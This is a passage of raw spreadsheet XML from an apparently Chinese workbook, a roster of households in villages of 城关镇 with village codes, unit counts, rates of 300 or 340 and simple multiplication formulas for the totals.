    </row>
    <row r="90" customHeight="1" spans="2:2">
      <c r="B90" t="s">
        <v>153</v>
      </c>
    </row>
    <row r="91" customHeight="1" spans="2:2">
      <c r="B91" t="s">
        <v>154</v>
      </c>
    </row>
    <row r="92" customHeight="1" spans="2:2">
      <c r="B92" t="s">
        <v>155</v>
      </c>
    </row>
    <row r="93" customHeight="1" spans="2:2">
      <c r="B93" t="s">
        <v>156</v>
      </c>
    </row>
    <row r="94" customHeight="1" spans="2:2">
      <c r="B94" t="s">
        <v>157</v>
      </c>
    </row>
    <row r="95" customHeight="1" spans="2:2">
      <c r="B95" t="s">
        <v>158</v>
      </c>
    </row>
    <row r="96" customHeight="1" spans="2:2">
      <c r="B96" t="s">
        <v>159</v>
      </c>
    </row>
    <row r="97" customHeight="1" spans="2:2">
      <c r="B97" t="s">
        <v>160</v>
      </c>
    </row>
    <row r="98" customHeight="1" spans="2:2">
      <c r="B98" t="s">
        <v>161</v>
      </c>
    </row>
    <row r="99" customHeight="1" spans="2:2">
      <c r="B99" t="s">
        <v>162</v>
      </c>
    </row>
    <row r="100" customHeight="1" spans="2:2">
      <c r="B100" t="s">
        <v>163</v>
      </c>
    </row>
    <row r="101" customHeight="1" spans="2:2">
      <c r="B101" t="s">
        <v>164</v>
      </c>
    </row>
    <row r="102" customHeight="1" spans="2:2">
      <c r="B102" t="s">
        <v>165</v>
      </c>
    </row>
    <row r="103" customHeight="1" spans="2:2">
      <c r="B103" t="s">
        <v>166</v>
      </c>
    </row>
    <row r="104" customHeight="1" spans="2:2">
      <c r="B104" t="s">
        <v>167</v>
      </c>
    </row>
    <row r="105" customHeight="1" spans="2:2">
      <c r="B105" t="s">
        <v>168</v>
      </c>
    </row>
    <row r="106" customHeight="1" spans="2:2">
      <c r="B106" t="s">
        <v>169</v>
      </c>
    </row>
    <row r="107" customHeight="1" spans="2:2">
      <c r="B107" t="s">
        <v>170</v>
      </c>
    </row>
    <row r="108" customHeight="1" spans="2:2">
      <c r="B108" t="s">
        <v>171</v>
      </c>
    </row>
    <row r="109" customHeight="1" spans="2:2">
      <c r="B109" t="s">
        <v>172</v>
      </c>
    </row>
    <row r="110" customHeight="1" spans="2:2">
      <c r="B110" t="s">
        <v>173</v>
      </c>
    </row>
    <row r="111" customHeight="1" spans="2:2">
      <c r="B111" t="s">
        <v>174</v>
      </c>
    </row>
    <row r="112" customHeight="1" spans="2:2">
      <c r="B112" t="s">
        <v>175</v>
      </c>
    </row>
    <row r="113" customHeight="1" spans="2:2">
      <c r="B113" t="s">
        <v>176</v>
      </c>
    </row>
    <row r="114" customHeight="1" spans="2:2">
      <c r="B114" t="s">
        <v>177</v>
      </c>
    </row>
    <row r="115" customHeight="1" spans="2:2">
      <c r="B115" t="s">
        <v>178</v>
      </c>
    </row>
    <row r="116" customHeight="1" spans="2:2">
      <c r="B116" t="s">
        <v>179</v>
      </c>
    </row>
    <row r="117" customHeight="1" spans="2:2">
      <c r="B117" t="s">
        <v>180</v>
      </c>
    </row>
    <row r="118" customHeight="1" spans="2:2">
      <c r="B118" t="s">
        <v>181</v>
      </c>
    </row>
    <row r="119" customHeight="1" spans="2:2">
      <c r="B119" t="s">
        <v>182</v>
      </c>
    </row>
    <row r="120" customHeight="1" spans="2:2">
      <c r="B120" t="s">
        <v>183</v>
      </c>
    </row>
    <row r="121" customHeight="1" spans="2:2">
      <c r="B121" t="s">
        <v>184</v>
      </c>
    </row>
    <row r="122" customHeight="1" spans="2:2">
      <c r="B122" t="s">
        <v>185</v>
      </c>
    </row>
    <row r="123" customHeight="1" spans="2:2">
      <c r="B123" t="s">
        <v>186</v>
      </c>
    </row>
    <row r="124" customHeight="1" spans="2:2">
      <c r="B124" t="s">
        <v>187</v>
      </c>
    </row>
    <row r="125" customHeight="1" spans="2:2">
      <c r="B125" t="s">
        <v>188</v>
      </c>
    </row>
    <row r="126" customHeight="1" spans="2:2">
      <c r="B126" t="s">
        <v>189</v>
      </c>
    </row>
    <row r="127" customHeight="1" spans="2:2">
      <c r="B127" t="s">
        <v>190</v>
      </c>
    </row>
    <row r="128" customHeight="1" spans="2:2">
      <c r="B128" t="s">
        <v>191</v>
      </c>
    </row>
    <row r="129" customHeight="1" spans="2:2">
      <c r="B129" t="s">
        <v>192</v>
      </c>
    </row>
    <row r="130" customHeight="1" spans="2:2">
      <c r="B130" t="s">
        <v>193</v>
      </c>
    </row>
    <row r="131" customHeight="1" spans="2:2">
      <c r="B131" t="s">
        <v>194</v>
      </c>
    </row>
    <row r="132" customHeight="1" spans="2:2">
      <c r="B132" t="s">
        <v>195</v>
      </c>
    </row>
    <row r="133" customHeight="1" spans="2:2">
      <c r="B133" t="s">
        <v>196</v>
      </c>
    </row>
    <row r="134" customHeight="1" spans="2:2">
      <c r="B134" t="s">
        <v>197</v>
      </c>
    </row>
    <row r="135" customHeight="1" spans="2:2">
      <c r="B135" t="s">
        <v>198</v>
      </c>
    </row>
    <row r="136" customHeight="1" spans="2:2">
      <c r="B136" t="s">
        <v>199</v>
      </c>
    </row>
    <row r="137" customHeight="1" spans="2:2">
      <c r="B137" t="s">
        <v>200</v>
      </c>
    </row>
    <row r="138" customHeight="1" spans="2:2">
      <c r="B138" t="s">
        <v>201</v>
      </c>
    </row>
    <row r="139" customHeight="1" spans="2:2">
      <c r="B139" t="s">
        <v>202</v>
      </c>
    </row>
    <row r="140" customHeight="1" spans="2:2">
      <c r="B140" t="s">
        <v>203</v>
      </c>
    </row>
    <row r="141" customHeight="1" spans="2:2">
      <c r="B141" t="s">
        <v>204</v>
      </c>
    </row>
    <row r="142" customHeight="1" spans="2:2">
      <c r="B142" t="s">
        <v>205</v>
      </c>
    </row>
  </sheetData>
  <pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.5" footer="0.5"/>
  <pageSetup paperSize="9" firstPageNumber="4294963191"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2747"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0">
      <pane xSplit="12" ySplit="4" topLeftCell="M5" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="R12" sqref="R12"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="30" customHeight="1"/>
  <cols>
    <col min="1" max="1" width="5.625" style="8" customWidth="1"/>
    <col min="2" max="2" width="8.5" style="6" customWidth="1"/>
    <col min="3" max="3" width="11.125" style="6" customWidth="1"/>
    <col min="4" max="4" width="9.75" style="6" customWidth="1"/>
    <col min="5" max="5" width="19.5" style="9" customWidth="1"/>
    <col min="6" max="6" width="12.375" style="9" customWidth="1"/>
    <col min="7" max="8" width="6.625" style="10" customWidth="1"/>
    <col min="9" max="9" width="7.125" style="10" customWidth="1"/>
    <col min="10" max="10" width="12.625" style="9" customWidth="1"/>
    <col min="11" max="11" width="15.625" style="11" customWidth="1"/>
    <col min="12" max="16376" width="9" style="6"/>
  </cols>
  <sheetData>
    <row r="1" ht="38" customHeight="1" spans="1:11">
      <c r="A1" s="12" t="s">
        <v>206</v>
      </c>
      <c r="B1" s="12"/>
      <c r="C1" s="12"/>
      <c r="D1" s="12"/>
      <c r="E1" s="12"/>
      <c r="F1" s="12"/>
      <c r="G1" s="12"/>
      <c r="H1" s="12"/>
      <c r="I1" s="16"/>
      <c r="J1" s="12"/>
      <c r="K1" s="12"/>
    </row>
    <row r="2" ht="34" customHeight="1" spans="1:11">
      <c r="A2" s="13" t="s">
        <v>207</v>
      </c>
      <c r="B2" s="14" t="s">
        <v>208</v>
      </c>
      <c r="C2" s="14" t="s">
        <v>209</v>
      </c>
      <c r="D2" s="14" t="s">
        <v>210</v>
      </c>
      <c r="E2" s="14" t="s">
        <v>211</v>
      </c>
      <c r="F2" s="14" t="s">
        <v>212</v>
      </c>
      <c r="G2" s="14" t="s">
        <v>213</v>
      </c>
      <c r="H2" s="14" t="s">
        <v>214</v>
      </c>
      <c r="I2" s="14" t="s">
        <v>215</v>
      </c>
      <c r="J2" s="14" t="s">
        <v>216</v>
      </c>
      <c r="K2" s="14" t="s">
        <v>217</v>
      </c>
    </row>
    <row r="3" ht="23" customHeight="1" spans="1:11">
      <c r="A3" s="13" t="s">
        <v>218</v>
      </c>
      <c r="B3" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C3" s="14" t="s">
        <v>220</v>
      </c>
      <c r="D3" s="14" t="s">
        <v>221</v>
      </c>
      <c r="E3" s="14" t="s">
        <v>222</v>
      </c>
      <c r="F3" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G3" s="14">
        <v>2</v>
      </c>
      <c r="H3" s="14">
        <v>300</v>
      </c>
      <c r="I3" s="14">
        <f>H3*G3</f>
        <v>600</v>
      </c>
      <c r="J3" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K3" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="4" ht="23" customHeight="1" spans="1:11">
      <c r="A4" s="13" t="s">
        <v>226</v>
      </c>
      <c r="B4" s="14" t="str">
        <f>B3</f>
        <v>城关镇</v>
      </c>
      <c r="C4" s="14" t="str">
        <f>C3</f>
        <v>东北六组</v>
      </c>
      <c r="D4" s="13" t="s">
        <v>227</v>
      </c>
      <c r="E4" s="13" t="s">
        <v>228</v>
      </c>
      <c r="F4" s="14" t="str">
        <f>F3</f>
        <v>4113210103</v>
      </c>
      <c r="G4" s="14"/>
      <c r="H4" s="14"/>
      <c r="I4" s="14"/>
      <c r="J4" s="14"/>
      <c r="K4" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="5" ht="23" customHeight="1" spans="1:11">
      <c r="A5" s="13" t="s">
        <v>229</v>
      </c>
      <c r="B5" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C5" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D5" s="14" t="s">
        <v>231</v>
      </c>
      <c r="E5" s="14" t="s">
        <v>232</v>
      </c>
      <c r="F5" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G5" s="14">
        <v>2</v>
      </c>
      <c r="H5" s="14">
        <v>300</v>
      </c>
      <c r="I5" s="14">
        <f>H5*G5</f>
        <v>600</v>
      </c>
      <c r="J5" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K5" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="6" ht="23" customHeight="1" spans="1:11">
      <c r="A6" s="13" t="s">
        <v>234</v>
      </c>
      <c r="B6" s="14" t="str">
        <f>B5</f>
        <v>城关镇</v>
      </c>
      <c r="C6" s="14" t="str">
        <f>C5</f>
        <v>中华村</v>
      </c>
      <c r="D6" s="13" t="s">
        <v>235</v>
      </c>
      <c r="E6" s="13" t="s">
        <v>236</v>
      </c>
      <c r="F6" s="14" t="str">
        <f>F5</f>
        <v>4113210108</v>
      </c>
      <c r="G6" s="14"/>
      <c r="H6" s="14"/>
      <c r="I6" s="14"/>
      <c r="J6" s="14"/>
      <c r="K6" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="7" ht="23" customHeight="1" spans="1:11">
      <c r="A7" s="13" t="s">
        <v>237</v>
      </c>
      <c r="B7" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C7" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D7" s="14" t="s">
        <v>238</v>
      </c>
      <c r="E7" s="14" t="s">
        <v>239</v>
      </c>
      <c r="F7" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G7" s="14">
        <v>1</v>
      </c>
      <c r="H7" s="14">
        <v>340</v>
      </c>
      <c r="I7" s="14">
        <f>H7*G7</f>
        <v>340</v>
      </c>
      <c r="J7" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K7" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="8" ht="23" customHeight="1" spans="1:11">
      <c r="A8" s="13" t="s">
        <v>240</v>
      </c>
      <c r="B8" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C8" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D8" s="14" t="s">
        <v>241</v>
      </c>
      <c r="E8" s="14" t="s">
        <v>242</v>
      </c>
      <c r="F8" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G8" s="14">
        <v>2</v>
      </c>
      <c r="H8" s="14">
        <v>300</v>
      </c>
      <c r="I8" s="14">
        <f>H8*G8</f>
        <v>600</v>
      </c>
      <c r="J8" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K8" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="9" ht="23" customHeight="1" spans="1:11">
      <c r="A9" s="13" t="s">
        <v>243</v>
      </c>
      <c r="B9" s="14" t="str">
        <f>B8</f>
        <v>城关镇</v>
      </c>
      <c r="C9" s="14" t="str">
        <f>C8</f>
        <v>中华村</v>
      </c>
      <c r="D9" s="13" t="s">
        <v>244</v>
      </c>
      <c r="E9" s="13" t="s">
        <v>245</v>
      </c>
      <c r="F9" s="14" t="str">
        <f>F8</f>
        <v>4113210108</v>
      </c>
      <c r="G9" s="14"/>
      <c r="H9" s="14"/>
      <c r="I9" s="14"/>
      <c r="J9" s="14"/>
      <c r="K9" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="10" ht="23" customHeight="1" spans="1:11">
      <c r="A10" s="13" t="s">
        <v>246</v>
      </c>
      <c r="B10" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C10" s="14" t="s">
        <v>247</v>
      </c>
      <c r="D10" s="14" t="s">
        <v>248</v>
      </c>
      <c r="E10" s="14" t="s">
        <v>249</v>
      </c>
      <c r="F10" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G10" s="14">
        <v>2</v>
      </c>
      <c r="H10" s="14">
        <v>300</v>
      </c>
      <c r="I10" s="14">
        <f>H10*G10</f>
        <v>600</v>
      </c>
      <c r="J10" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K10" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="11" ht="23" customHeight="1" spans="1:11">
      <c r="A11" s="13" t="s">
        <v>250</v>
      </c>
      <c r="B11" s="14" t="str">
        <f>B10</f>
        <v>城关镇</v>
      </c>
      <c r="C11" s="14" t="str">
        <f>C10</f>
        <v>东北四组</v>
      </c>
      <c r="D11" s="13" t="s">
        <v>251</v>
      </c>
      <c r="E11" s="13" t="s">
        <v>252</v>
      </c>
      <c r="F11" s="14" t="str">
        <f>F10</f>
        <v>4113210103</v>
      </c>
      <c r="G11" s="14"/>
      <c r="H11" s="14"/>
      <c r="I11" s="14"/>
      <c r="J11" s="14"/>
      <c r="K11" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="12" ht="23" customHeight="1" spans="1:11">
      <c r="A12" s="13" t="s">
        <v>253</v>
      </c>
      <c r="B12" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C12" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D12" s="14" t="s">
        <v>254</v>
      </c>
      <c r="E12" s="14" t="s">
        <v>255</v>
      </c>
      <c r="F12" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G12" s="14">
        <v>1</v>
      </c>
      <c r="H12" s="14">
        <v>340</v>
      </c>
      <c r="I12" s="14">
        <f>H12*G12</f>
        <v>340</v>
      </c>
      <c r="J12" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K12" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="13" ht="23" customHeight="1" spans="1:11">
      <c r="A13" s="13" t="s">
        <v>256</v>
      </c>
      <c r="B13" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C13" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D13" s="14" t="s">
        <v>257</v>
      </c>
      <c r="E13" s="14" t="s">
        <v>258</v>
      </c>
      <c r="F13" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G13" s="14">
        <v>2</v>
      </c>
      <c r="H13" s="14">
        <v>300</v>
      </c>
      <c r="I13" s="14">
        <f>H13*G13</f>
        <v>600</v>
      </c>
      <c r="J13" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K13" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="14" ht="23" customHeight="1" spans="1:11">
      <c r="A14" s="13" t="s">
        <v>259</v>
      </c>
      <c r="B14" s="14" t="str">
        <f>B13</f>
        <v>城关镇</v>
      </c>
      <c r="C14" s="14" t="str">
        <f>C13</f>
        <v>中华村</v>
      </c>
      <c r="D14" s="15" t="s">
        <v>260</v>
      </c>
      <c r="E14" s="15" t="s">
        <v>261</v>
      </c>
      <c r="F14" s="14" t="str">
        <f>F13</f>
        <v>4113210108</v>
      </c>
      <c r="G14" s="14"/>
      <c r="H14" s="14"/>
      <c r="I14" s="14"/>
      <c r="J14" s="14"/>
      <c r="K14" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="15" ht="23" customHeight="1" spans="1:11">
      <c r="A15" s="13" t="s">
        <v>262</v>
      </c>
      <c r="B15" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C15" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D15" s="14" t="s">
        <v>264</v>
      </c>
      <c r="E15" s="14" t="s">
        <v>265</v>
      </c>
      <c r="F15" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G15" s="14">
        <v>2</v>
      </c>
      <c r="H15" s="14">
        <v>300</v>
      </c>
      <c r="I15" s="14">
        <f>H15*G15</f>
        <v>600</v>
      </c>
      <c r="J15" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K15" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="16" ht="23" customHeight="1" spans="1:11">
      <c r="A16" s="13" t="s">
        <v>267</v>
      </c>
      <c r="B16" s="14" t="str">
        <f>B15</f>
        <v>城关镇</v>
      </c>
      <c r="C16" s="14" t="str">
        <f>C15</f>
        <v>西北村</v>
      </c>
      <c r="D16" s="13" t="s">
        <v>268</v>
      </c>
      <c r="E16" s="13" t="s">
        <v>269</v>
      </c>
      <c r="F16" s="14" t="str">
        <f>F15</f>
        <v>4113210106</v>
      </c>
      <c r="G16" s="14"/>
      <c r="H16" s="14"/>
      <c r="I16" s="14"/>
      <c r="J16" s="14"/>
      <c r="K16" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="17" ht="23" customHeight="1" spans="1:11">
      <c r="A17" s="13" t="s">
        <v>270</v>
      </c>
      <c r="B17" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C17" s="14" t="s">
        <v>271</v>
      </c>
      <c r="D17" s="14" t="s">
        <v>272</v>
      </c>
      <c r="E17" s="14" t="s">
        <v>273</v>
      </c>
      <c r="F17" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G17" s="14">
        <v>2</v>
      </c>
      <c r="H17" s="14">
        <v>300</v>
      </c>
      <c r="I17" s="14">
        <f>H17*G17</f>
        <v>600</v>
      </c>
      <c r="J17" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K17" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="18" ht="23" customHeight="1" spans="1:11">
      <c r="A18" s="13" t="s">
        <v>274</v>
      </c>
      <c r="B18" s="14" t="str">
        <f>B17</f>
        <v>城关镇</v>
      </c>
      <c r="C18" s="14" t="str">
        <f>C17</f>
        <v>东北五组</v>
      </c>
      <c r="D18" s="13" t="s">
        <v>275</v>
      </c>
      <c r="E18" s="13" t="s">
        <v>276</v>
      </c>
      <c r="F18" s="14" t="str">
        <f>F17</f>
        <v>4113210103</v>
      </c>
      <c r="G18" s="14"/>
      <c r="H18" s="14"/>
      <c r="I18" s="14"/>
      <c r="J18" s="14"/>
      <c r="K18" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="19" ht="23" customHeight="1" spans="1:11">
      <c r="A19" s="13" t="s">
        <v>277</v>
      </c>
      <c r="B19" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C19" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D19" s="14" t="s">
        <v>278</v>
      </c>
      <c r="E19" s="14" t="s">
        <v>265</v>
      </c>
      <c r="F19" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G19" s="14">
        <v>1</v>
      </c>
      <c r="H19" s="14">
        <v>340</v>
      </c>
      <c r="I19" s="14">
        <f t="shared" ref="I19:I25" si="0">H19*G19</f>
        <v>340</v>
      </c>
      <c r="J19" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K19" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="20" ht="23" customHeight="1" spans="1:11">
      <c r="A20" s="13" t="s">
        <v>279</v>
      </c>
      <c r="B20" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C20" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D20" s="14" t="s">
        <v>280</v>
      </c>
      <c r="E20" s="14" t="s">
        <v>281</v>
      </c>
      <c r="F20" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G20" s="14">
        <v>1</v>
      </c>
      <c r="H20" s="14">
        <v>340</v>
      </c>
      <c r="I20" s="14">
        <f t="shared" si="0"/>
        <v>340</v>
      </c>
      <c r="J20" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K20" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="21" ht="23" customHeight="1" spans="1:11">
      <c r="A21" s="13" t="s">
        <v>282</v>
      </c>
      <c r="B21" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C21" s="14" t="s">
        <v>220</v>
      </c>
      <c r="D21" s="14" t="s">
        <v>283</v>
      </c>
      <c r="E21" s="14" t="s">
        <v>284</v>
      </c>
      <c r="F21" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G21" s="14">
        <v>1</v>
      </c>
      <c r="H21" s="14">
        <v>340</v>
      </c>
      <c r="I21" s="14">
        <f t="shared" si="0"/>
        <v>340</v>
      </c>
      <c r="J21" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K21" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="22" ht="23" customHeight="1" spans="1:11">
      <c r="A22" s="13" t="s">
        <v>285</v>
      </c>
      <c r="B22" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C22" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D22" s="14" t="s">
        <v>287</v>
      </c>
      <c r="E22" s="14" t="s">
        <v>288</v>
      </c>
      <c r="F22" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G22" s="14">
        <v>1</v>
      </c>
      <c r="H22" s="14">
        <v>340</v>
      </c>
      <c r="I22" s="14">
        <f t="shared" si="0"/>
        <v>340</v>
      </c>
      <c r="J22" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K22" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="23" ht="23" customHeight="1" spans="1:11">
      <c r="A23" s="13" t="s">
        <v>290</v>
      </c>
      <c r="B23" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C23" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D23" s="14" t="s">
        <v>291</v>
      </c>
      <c r="E23" s="14" t="s">
        <v>292</v>
      </c>
      <c r="F23" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G23" s="14">
        <v>1</v>
      </c>
      <c r="H23" s="14">
        <v>340</v>
      </c>
      <c r="I23" s="14">
        <f t="shared" si="0"/>
        <v>340</v>
      </c>
      <c r="J23" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K23" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="24" ht="23" customHeight="1" spans="1:11">
      <c r="A24" s="13" t="s">
        <v>293</v>
      </c>
      <c r="B24" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C24" s="14" t="s">
        <v>220</v>
      </c>
      <c r="D24" s="14" t="s">
        <v>294</v>
      </c>
      <c r="E24" s="14" t="s">
        <v>295</v>
      </c>
      <c r="F24" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G24" s="14">
        <v>1</v>
      </c>
      <c r="H24" s="14">
        <v>340</v>
      </c>
      <c r="I24" s="14">
        <f t="shared" si="0"/>
        <v>340</v>
      </c>
      <c r="J24" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K24" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="25" ht="23" customHeight="1" spans="1:11">
      <c r="A25" s="13" t="s">
        <v>296</v>
      </c>
      <c r="B25" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C25" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D25" s="14" t="s">
        <v>297</v>
      </c>
      <c r="E25" s="14" t="s">
        <v>298</v>
      </c>
      <c r="F25" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G25" s="14">
        <v>2</v>
      </c>
      <c r="H25" s="14">
        <v>300</v>
      </c>
      <c r="I25" s="14">
        <f t="shared" si="0"/>
        <v>600</v>
      </c>
      <c r="J25" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K25" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="26" ht="23" customHeight="1" spans="1:11">
      <c r="A26" s="13" t="s">
        <v>299</v>
      </c>
      <c r="B26" s="14" t="str">
        <f>B25</f>
        <v>城关镇</v>
      </c>
      <c r="C26" s="14" t="str">
        <f>C25</f>
        <v>中华村</v>
      </c>
      <c r="D26" s="13" t="s">
        <v>300</v>
      </c>
      <c r="E26" s="13" t="s">
        <v>292</v>
      </c>
      <c r="F26" s="14" t="str">
        <f>F25</f>
        <v>4113210108</v>
      </c>
      <c r="G26" s="14"/>
      <c r="H26" s="14"/>
      <c r="I26" s="14"/>
      <c r="J26" s="14"/>
      <c r="K26" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="27" ht="23" customHeight="1" spans="1:11">
      <c r="A27" s="13" t="s">
        <v>301</v>
      </c>
      <c r="B27" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C27" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D27" s="14" t="s">
        <v>302</v>
      </c>
      <c r="E27" s="14" t="s">
        <v>303</v>
      </c>
      <c r="F27" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G27" s="14">
        <v>1</v>
      </c>
      <c r="H27" s="14">
        <v>340</v>
      </c>
      <c r="I27" s="14">
        <f>H27*G27</f>
        <v>340</v>
      </c>
      <c r="J27" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K27" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="28" ht="23" customHeight="1" spans="1:11">
      <c r="A28" s="13" t="s">
        <v>304</v>
      </c>
      <c r="B28" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C28" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D28" s="14" t="s">
        <v>305</v>
      </c>
      <c r="E28" s="14" t="s">
        <v>306</v>
      </c>
      <c r="F28" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G28" s="14">
        <v>2</v>
      </c>
      <c r="H28" s="14">
        <v>300</v>
      </c>
      <c r="I28" s="14">
        <f>H28*G28</f>
        <v>600</v>
      </c>
      <c r="J28" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K28" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="29" ht="23" customHeight="1" spans="1:11">
      <c r="A29" s="13" t="s">
        <v>307</v>
      </c>
      <c r="B29" s="14" t="str">
        <f>B28</f>
        <v>城关镇</v>
      </c>
      <c r="C29" s="14" t="str">
        <f>C28</f>
        <v>中华村</v>
      </c>
      <c r="D29" s="13" t="s">
        <v>308</v>
      </c>
      <c r="E29" s="13" t="s">
        <v>309</v>
      </c>
      <c r="F29" s="14" t="str">
        <f>F28</f>
        <v>4113210108</v>
      </c>
      <c r="G29" s="14"/>
      <c r="H29" s="14"/>
      <c r="I29" s="14"/>
      <c r="J29" s="14"/>
      <c r="K29" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="30" ht="23" customHeight="1" spans="1:11">
      <c r="A30" s="13" t="s">
        <v>310</v>
      </c>
      <c r="B30" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C30" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D30" s="14" t="s">
        <v>311</v>
      </c>
      <c r="E30" s="14" t="s">
        <v>312</v>
      </c>
      <c r="F30" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G30" s="14">
        <v>1</v>
      </c>
      <c r="H30" s="14">
        <v>340</v>
      </c>
      <c r="I30" s="14">
        <f>H30*G30</f>
        <v>340</v>
      </c>
      <c r="J30" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K30" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="31" ht="23" customHeight="1" spans="1:11">
      <c r="A31" s="13" t="s">
        <v>313</v>
      </c>
      <c r="B31" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C31" s="14" t="s">
        <v>220</v>
      </c>
      <c r="D31" s="14" t="s">
        <v>314</v>
      </c>
      <c r="E31" s="14" t="s">
        <v>276</v>
      </c>
      <c r="F31" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G31" s="14">
        <v>1</v>
      </c>
      <c r="H31" s="14">
        <v>340</v>
      </c>
      <c r="I31" s="14">
        <f>H31*G31</f>
        <v>340</v>
      </c>
      <c r="J31" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K31" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="32" ht="23" customHeight="1" spans="1:11">
      <c r="A32" s="13" t="s">
        <v>315</v>
      </c>
      <c r="B32" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C32" s="14" t="s">
        <v>220</v>
      </c>
      <c r="D32" s="14" t="s">
        <v>316</v>
      </c>
      <c r="E32" s="14" t="s">
        <v>269</v>
      </c>
      <c r="F32" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G32" s="14">
        <v>1</v>
      </c>
      <c r="H32" s="14">
        <v>340</v>
